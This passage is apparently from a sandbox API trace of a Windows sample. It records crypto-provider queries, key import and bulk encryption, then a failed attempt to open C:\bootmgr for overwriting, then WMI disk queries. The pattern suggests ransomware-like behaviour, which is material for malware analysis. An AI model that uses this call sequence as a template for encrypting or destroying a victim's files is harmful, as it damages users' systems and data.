pdwDataLen=0x641f1fc) returned 1 [0139.394] CoTaskMemFree (pv=0x7acc28) [0139.394] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.395] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.395] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.395] CoTaskMemFree (pv=0x7acc28) [0139.395] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.395] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.395] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.395] CoTaskMemFree (pv=0x7acc28) [0139.395] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.395] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.395] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.395] CoTaskMemFree (pv=0x7acc28) [0139.395] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.395] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.395] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.395] CoTaskMemFree (pv=0x7acc28) [0139.395] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.395] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.395] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.396] CoTaskMemFree (pv=0x7acc28) [0139.396] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.396] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.396] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.396] CoTaskMemFree (pv=0x7acc28) [0139.396] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.396] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.396] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.396] CoTaskMemFree (pv=0x7acc28) [0139.396] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.396] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.396] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.396] CoTaskMemFree (pv=0x7acc28) [0139.396] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.396] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.396] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.396] CoTaskMemFree (pv=0x7acc28) [0139.396] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.397] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.397] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.397] CoTaskMemFree (pv=0x7acc28) [0139.397] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.397] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.397] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.397] CoTaskMemFree (pv=0x7acc28) [0139.397] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.397] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.397] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.397] CoTaskMemFree (pv=0x7acc28) [0139.397] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.397] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.397] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.397] CoTaskMemFree (pv=0x7acc28) [0139.397] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.397] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.397] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.398] CoTaskMemFree (pv=0x7acc28) [0139.398] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.398] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.398] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.398] CoTaskMemFree (pv=0x7acc28) [0139.398] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.398] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.398] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.398] CoTaskMemFree (pv=0x7acc28) [0139.398] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 0 [0141.103] CryptGenRandom (in: hProv=0x6ee740, dwLen=0x10, pbBuffer=0x33b4844 | out: pbBuffer=0x33b4844) returned 1 [0144.231] CryptImportKey (in: hProv=0x6ee740, pbData=0x392b0fc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x641f208 | out: phKey=0x641f208*=0x77b130) returned 1 [0144.231] CryptContextAddRef (hProv=0x6ee740, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.232] CryptContextAddRef (hProv=0x6ee740, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.232] CryptDuplicateKey (in: hKey=0x77b130, pdwReserved=0x0, dwFlags=0x0, phKey=0x641f1f8 | out: phKey=0x641f1f8*=0x77b170) returned 1 [0144.232] CryptContextAddRef (hProv=0x6ee740, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.232] CryptSetKeyParam (hKey=0x77b170, dwParam=0x4, pbData=0x392b1dc*=0x1, dwFlags=0x0) returned 1 [0144.232] CryptSetKeyParam (hKey=0x77b170, dwParam=0x1, pbData=0x392b1a8, dwFlags=0x0) returned 1 [0144.478] CryptEncrypt (in: hKey=0x77b170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x46f2910*, pdwDataLen=0x641f264*=0x5db30, dwBufLen=0x5db30 | out: pbData=0x46f2910*, pdwDataLen=0x641f264*=0x5db30) returned 1 [0144.481] CryptEncrypt (in: hKey=0x77b170, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342ff48*, pdwDataLen=0x641f26c*=0x0, dwBufLen=0x10 | out: pbData=0x342ff48*, pdwDataLen=0x641f26c*=0x10) returned 1 [0146.826] CryptDestroyKey (hKey=0x77b130) returned 1 [0146.826] CryptReleaseContext (hProv=0x6ee740, dwFlags=0x0) returned 1 [0146.826] CryptReleaseContext (hProv=0x6ee740, dwFlags=0x0) returned 1 [0146.826] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x641ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0146.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f1d0) returned 1 [0146.827] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0148.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641e008) returned 1 [0148.082] CoTaskMemAlloc (cb=0x20c) returned 0x771fc0 [0148.082] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x771fc0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0148.082] CoTaskMemFree (pv=0x771fc0) [0148.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x641ecc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0148.082] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f20c | out: ppv=0x641f20c*=0x72015c) returned 0x0 [0148.082] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f204 | out: pAptType=0x641f204*=1) returned 0x0 [0148.082] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f208 | out: ppvObject=0x641f208*=0x0) returned 0x80004002 [0148.082] IUnknown:Release (This=0x72015c) returned 0x1 [0148.083] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641eb78 | out: ppv=0x641eb78*=0x6736e48) returned 0x0 [0148.083] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e48, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641ed90 | out: ppvObject=0x641ed90*=0x0) returned 0x80004002 [0148.083] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e48, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641eda4 | out: ppvObject=0x641eda4*=0x6738380) returned 0x0 [0148.083] WbemDefPath:IUnknown:Release (This=0x6736e48) returned 0x0 [0148.083] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e9c4 | out: ppvObject=0x641e9c4*=0x6738380) returned 0x0 [0148.083] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641e980 | out: ppvObject=0x641e980*=0x0) returned 0x80004002 [0148.084] WbemDefPath:IUnknown:AddRef (This=0x6738380) returned 0x3 [0148.084] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e2dc | out: ppvObject=0x641e2dc*=0x0) returned 0x80004002 [0148.084] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e28c | out: ppvObject=0x641e28c*=0x0) returned 0x80004002 [0148.084] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e298 | out: ppvObject=0x641e298*=0x77da98) returned 0x0 [0148.084] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77da98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e2a0 | out: pCid=0x641e2a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.084] WbemDefPath:IUnknown:Release (This=0x77da98) returned 0x3 [0148.084] CoGetContextToken (in: pToken=0x641e2f8 | out: pToken=0x641e2f8) returned 0x0 [0148.084] CoGetContextToken (in: pToken=0x641e700 | out: pToken=0x641e700) returned 0x0 [0148.084] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e790 | out: ppvObject=0x641e790*=0x0) returned 0x80004002 [0148.084] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x2 [0148.084] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x1 [0148.084] CoGetContextToken (in: pToken=0x641f088 | out: pToken=0x641f088) returned 0x0 [0148.084] CoGetContextToken (in: pToken=0x641efe8 | out: pToken=0x641efe8) returned 0x0 [0148.084] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x641f0b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x641f0b4 | out: ppvObject=0x641f0b4*=0x6738380) returned 0x0 [0148.084] WbemDefPath:IUnknown:AddRef (This=0x6738380) returned 0x3 [0148.084] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x2 [0148.085] WbemDefPath:IWbemPath:SetText (This=0x6738380, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.085] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738380, puCount=0x641f238 | out: puCount=0x641f238*=0x0) returned 0x0 [0148.085] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=2, puBuffLength=0x641f234*=0x0, pszText=0x0 | out: puBuffLength=0x641f234*=0x20, pszText=0x0) returned 0x0 [0148.085] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=2, puBuffLength=0x641f234*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f234*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.085] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738380, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0148.085] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738380, puCount=0x641f238 | out: puCount=0x641f238*=0x0) returned 0x0 [0148.085] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738380, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0148.085] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738380, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0148.085] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738380, puCount=0x641f1b8 | out: puCount=0x641f1b8*=0x0) returned 0x0 [0148.085] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x641f1a4 | out: puCount=0x641f1a4*=0x2) returned 0x0 [0148.085] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x641f1a0*=0x0, pszText=0x0 | out: puBuffLength=0x641f1a0*=0xf, pszText=0x0) returned 0x0 [0148.085] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x641f1a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f1a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.085] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f154 | out: ppv=0x641f154*=0x72015c) returned 0x0 [0148.085] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f14c | out: pAptType=0x641f14c*=1) returned 0x0 [0148.085] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f150 | out: ppvObject=0x641f150*=0x0) returned 0x80004002 [0148.085] IUnknown:Release (This=0x72015c) returned 0x1 [0148.086] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641eac0 | out: ppv=0x641eac0*=0x6736e28) returned 0x0 [0148.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e28, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641ecd8 | out: ppvObject=0x641ecd8*=0x0) returned 0x80004002 [0148.086] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e28, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ecec | out: ppvObject=0x641ecec*=0x6738310) returned 0x0 [0148.087] WbemDefPath:IUnknown:Release (This=0x6736e28) returned 0x0 [0148.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e90c | out: ppvObject=0x641e90c*=0x6738310) returned 0x0 [0148.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641e8c8 | out: ppvObject=0x641e8c8*=0x0) returned 0x80004002 [0148.087] WbemDefPath:IUnknown:AddRef (This=0x6738310) returned 0x3 [0148.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e224 | out: ppvObject=0x641e224*=0x0) returned 0x80004002 [0148.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e1d4 | out: ppvObject=0x641e1d4*=0x0) returned 0x80004002 [0148.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e1e0 | out: ppvObject=0x641e1e0*=0x77da58) returned 0x0 [0148.087] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77da58, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e1e8 | out: pCid=0x641e1e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.087] WbemDefPath:IUnknown:Release (This=0x77da58) returned 0x3 [0148.087] CoGetContextToken (in: pToken=0x641e240 | out: pToken=0x641e240) returned 0x0 [0148.087] CoGetContextToken (in: pToken=0x641e648 | out: pToken=0x641e648) returned 0x0 [0148.087] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e6d8 | out: ppvObject=0x641e6d8*=0x0) returned 0x80004002 [0148.088] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x2 [0148.088] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x1 [0148.088] CoGetContextToken (in: pToken=0x641efd0 | out: pToken=0x641efd0) returned 0x0 [0148.088] CoGetContextToken (in: pToken=0x641ef30 | out: pToken=0x641ef30) returned 0x0 [0148.088] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x641f000*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x641effc | out: ppvObject=0x641effc*=0x6738310) returned 0x0 [0148.088] WbemDefPath:IUnknown:AddRef (This=0x6738310) returned 0x3 [0148.088] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x2 [0148.088] WbemDefPath:IWbemPath:SetText (This=0x6738310, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0148.088] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738310, puCount=0x641f17c | out: puCount=0x641f17c*=0x2) returned 0x0 [0148.088] WbemDefPath:IWbemPath:GetText (in: This=0x6738310, lFlags=4, puBuffLength=0x641f178*=0x0, pszText=0x0 | out: puBuffLength=0x641f178*=0xf, pszText=0x0) returned 0x0 [0148.088] WbemDefPath:IWbemPath:GetText (in: This=0x6738310, lFlags=4, puBuffLength=0x641f178*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f178*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.088] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f17c | out: ppv=0x641f17c*=0x72015c) returned 0x0 [0148.088] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f174 | out: pAptType=0x641f174*=1) returned 0x0 [0148.088] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f178 | out: ppvObject=0x641f178*=0x0) returned 0x80004002 [0148.088] IUnknown:Release (This=0x72015c) returned 0x1 [0148.089] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641ed98 | out: ppv=0x641ed98*=0x672f418) returned 0x0 [0148.089] WbemLocator:IUnknown:QueryInterface (in: This=0x672f418, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, 